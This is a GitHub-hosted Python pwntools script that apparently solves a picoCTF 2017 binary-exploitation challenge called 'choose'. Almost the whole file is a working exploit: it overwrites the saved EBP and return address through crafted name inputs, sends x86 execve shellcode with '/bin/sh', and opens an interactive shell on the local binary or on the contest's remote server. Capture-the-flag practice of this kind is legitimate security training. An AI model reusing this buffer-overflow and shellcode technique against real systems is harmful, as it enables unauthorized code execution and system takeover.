-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit.py
112 lines (91 loc) · 3.04 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#!/usr/bin/python
import sys
import time
import argparse
from pwn import *
# setting
context.arch = 'i386'
context.os = 'linux'
context.endian = 'little'
context.word_size = 32
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'INFO'
shellcode = "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
def get_addr_of_enemy(r):
print r.recvuntil("Your sight shows the enemy at ")
addr = r.recvuntil('\n').rstrip()
return addr
#--------------------------------------------------------------------------
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit the bins.')
parser.add_argument('--dbg' , '-d', action="store_true")
parser.add_argument('--remote', '-r', action="store_true")
args = parser.parse_args()
if args.remote:
r = remote('shell2017.picoctf.com', 43651)
else:
r = process('./choose')
if args.dbg:
gdb.attach(r, """
vmmap
b *main
""")
# 0x80ed044 <inputStr> size 8bytes
"""
Enter 'o' for an orc #Blocking sword 0x14
'g' for a goblin #Improved Healing 0x14
'k' for a kobold #Shield Stengthening 0x14
'u' for a unicorn #Sword sharpening 0x18
'c' for a centaur #Healing Potion 0x18
't' for a troll #Wizard sight 0x14
"""
# Size of structs are different due to memory alignment
print r.sendline('t')
for i in range(0,10):
print r.sendline('u')
#Use this to overwrite the EBP and return
print r.recvuntil("Enter a name for this")
for i in range(0,11):
payload = 'aa'
payload += p32(0x080ed044-6) # EBP
payload += p32(0x08048eb7) # RET
payload += p32(100) # pad
print r.sendline(payload)
"""
enemy_addrs = []
#figuring out address and sizes
for i in range(0,11):
print r.sendline('a')
addr = int(get_addr_of_enemy(r)[2:],16)
enemy_addrs.append(addr)
previous = 0
for i in enemy_addrs:
print "%s: diff = %s" %(hex(i), hex(i - previous))
previous = i
print '-'*80
"""
print r.sendline('a')
for i in range(0,100):
print r.recvuntil('You have ')
health = int(r.recvuntil(' ').rstrip().lstrip())
print "health now is %d" %health
if (70 > health):
print "We are done here, move along, nothing to see"
break
print r.sendline('a')
#We are at the final last blow. After this we exit the function,
# so load the inputStr with values to use. We pointed EBP to this buffer
# so that the address we jump to will load reletive to ebp
payload = 'HH'
payload += p32(0x80ed040) #Address to read data to
payload += 'AAA' #Length of bytes to read. This is not needed though
r.sendline(payload)
payload2 = ''
payload2 += 'aa' #first two chars are just junk
payload2 += p32(0x80ed04a) #Return pointer, which points to shellcode
payload2 += shellcode
#"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
payload2 += "/bin/sh"
r.sendline(payload2)
# Drop to interactive console
r.interactive()